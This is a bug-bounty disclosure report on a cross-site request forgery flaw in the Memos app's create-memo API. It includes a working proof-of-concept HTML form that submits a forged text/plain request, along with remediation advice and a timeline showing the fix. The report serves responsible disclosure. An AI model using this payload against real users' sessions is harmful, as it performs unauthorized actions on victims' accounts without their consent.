Cross Site Request Forgery in Create a Memo Functionality (POST /api/memo) in usememos/memos

Valid

Reported on

Dec 27th 2022


Description

I have discovered in Memos a CSRF Vulnerability (in Create a Memo Functionality (POST /api/memo).

I have identified that it is possible to manipulate the actions of authenticated users by tricking them into clicking on a malicious link or visiting a malicious website while they are logged into Memos. This can allow an attacker to perform actions on behalf of the victim, such as creating or modifying memos.

To reproduce the vulnerability, I followed these steps:

  1. I logged into the Memos application with a valid account.
  2. I created a malicious HTML file containing a form that submits a request to the Memos application to create a new memo, with the title and content set to a predetermined value:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:5230/api/memo" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  1. I hosted the malicious HTML file on a server and shared the link with a victim who was also logged into the Memos application.
  2. When the victim clicked on the link, a new memo was created in their account with the predetermined title and content, without their knowledge or consent.

I have attached a proof-of-concept HTML file and a video demonstrating the vulnerability to this report.

The Cross-Site Request Forgery (CSRF) vulnerability in the application is occurring because the application is not validating the Content-Type to be of the type application/json and is allowing the submission of text/plain.

By allowing requests with text/plain as the Content-Type, the application is vulnerable to CSRF attacks

Proof of Concept

https://drive.google.com/file/d/10eIE2pXRcVDT1juyGu5_MSmvzgTmj_35/view?usp=sharing

Remediation

I recommend that you take the following steps to mitigate this vulnerability: Implement proper CSRF protection, such as including a unique token in all forms and verifing it on the server-side. The application should validate the Content-Type of requests to ensure that they are of the correct type, such as application/json. This will prevent attackers from being able to leverage the vulnerability to perform unauthorized actions.

Impact

A Cross-Site Request Forgery (CSRF) vulnerability can have significant impact on the security and integrity of an application.

If exploited, a CSRF vulnerability can allow an attacker to perform actions on behalf of an authenticated user, without their knowledge or consent. This can lead to unauthorized access to sensitive information, modification or deletion of data, and other malicious actions.

In addition to the direct impact on users, a CSRF vulnerability can also damage the reputation and trust of the affected application and its owner. Users may lose confidence in the security of the application and may be less likely to use it, leading to potential financial losses for the business.

It is important for organizations to take steps to prevent and mitigate CSRF vulnerabilities in their applications, in order to protect their users and maintain the trust and integrity of their systems.

We are processing your report and will contact the usememos/memos team within 24 hours. 13 days ago
Alan Brian modified the report
13 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 12 days ago
STEVEN validated this vulnerability 11 days ago
Alan Brian has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago
to join this conversation